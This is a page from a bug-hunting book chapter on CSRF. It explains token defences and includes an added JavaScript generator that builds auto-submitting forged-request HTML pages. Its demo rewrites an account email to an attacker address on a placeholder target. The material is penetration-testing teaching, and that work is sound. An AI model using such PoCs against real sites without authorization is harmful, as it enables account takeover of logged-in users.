Page 108 - Hands-On Bug Hunting for Penetration Testers
Chapter 6: CSRF and Insecure Session Authentication
Many frameworks (Spring, Joomla, and Django among them) ship their own CSRF protection, which
usually amounts to a synchronizer token: an unpredictable, session-bound value that is embedded
in each form and checked on every state-changing request, so that the session cookie on its
own is no longer enough to authorize an action. Yet, despite CSRF's status as a solved problem,
it persisted as a recurring entry in the OWASP Top 10 lists for years. Like SQLi, CSRF is a
simple-but-damaging vulnerability that endures largely because of the tension in software
development between security and productivity.
The following topics will be covered in this chapter:
Mechanics of CSRF
Tools to use for finding and validating CSRF vulnerabilities
Discovering, validating, and reporting on CSRF vulnerabilities
Technical Requirements
For this chapter, we'll be using Burp Suite and, for our everyday web browsing and proxying,
Chrome. We'll once again be employing Python 3.6.5 and the standard macOS version of
shell (sh) for scripting.
Building and Using CSRF PoCs
A CSRF proof of concept is just a short HTML snippet that, when loaded in the browser of a user
who is logged in to the target application, takes advantage of the weak or missing CSRF defence:
the browser attaches the user's session cookie to the forged request, and the application
changes state in a way the user never intended. That observable state change is what validates
the vulnerability.
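Here is an added example (my code, not the book's) of a small generator that builds such a snippet from a request captured in the proxy: it decodes the urlencoded body into fields, escapes each value for HTML so an odd character cannot break the form markup, and emits an auto-submitting form in the style of Burp's "Generate CSRF PoC". The target URL, field names and captured body are constructed placeholders, not a real application's.

```javascript
// Added example, not from the book: turn a captured state-changing request into a CSRF PoC
// page. The target URL, field names and body used here are constructed placeholders.

// Escape a value for a double-quoted HTML attribute so captured parameter values containing
// quotes or angle brackets cannot break out of the form markup.
function escapeHtmlAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Decode an application/x-www-form-urlencoded body, as copied from the proxy, into fields.
function parseFormBody(rawBody) {
  return Object.fromEntries(new URLSearchParams(rawBody));
}

// Build the PoC: a form whose hidden inputs replay the captured parameters, submitted on
// load. A logged-in victim's browser attaches the target's session cookie, so the
// application processes the request as if the victim had used the real form.
function buildCsrfPoc(action, method, fields, { autoSubmit = true } = {}) {
  const m = String(method).toUpperCase();
  if (m !== 'GET' && m !== 'POST') {
    throw new Error('HTML forms can only submit GET or POST');
  }
  const inputs = Object.entries(fields).map(([name, value]) =>
    `    <input type="hidden" name="${escapeHtmlAttr(name)}" value="${escapeHtmlAttr(value)}">`);
  const lines = [
    '<!DOCTYPE html>',
    '<html>',
    '<body>',
    `  <form id="csrf" action="${escapeHtmlAttr(action)}" method="${m}">`,
    ...inputs,
    '    <input type="submit" value="Submit">',
    '  </form>',
  ];
  if (autoSubmit) {
    lines.push("  <script>document.getElementById('csrf').submit();</script>");
  }
  lines.push('</body>', '</html>');
  return lines.join('\n');
}

// Stand-alone demo with a constructed capture: the body as it would appear in the proxy.
function demo() {
  const capturedBody = 'email=attacker%40example.com&display_name=Mallory+%22x%22';
  return buildCsrfPoc('https://target.example/account/update', 'POST', parseFormBody(capturedBody));
}
```

Save the output as an .html file and open it in a browser session that is logged in to the target, then confirm the change by reloading the affected page: the PoC is only valid if the application actually applied the forged request. If it was refused, look for a token field in the original request, or a SameSite attribute on the session cookie, before concluding the form is protected.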
Creating a CSRF PoC Code Snippet
As the basis for building a CSRF PoC snippet, let's go back to a form on the deliberately
vulnerable web app, webscantest.com, that's vulnerable to both XSS and CSRF:

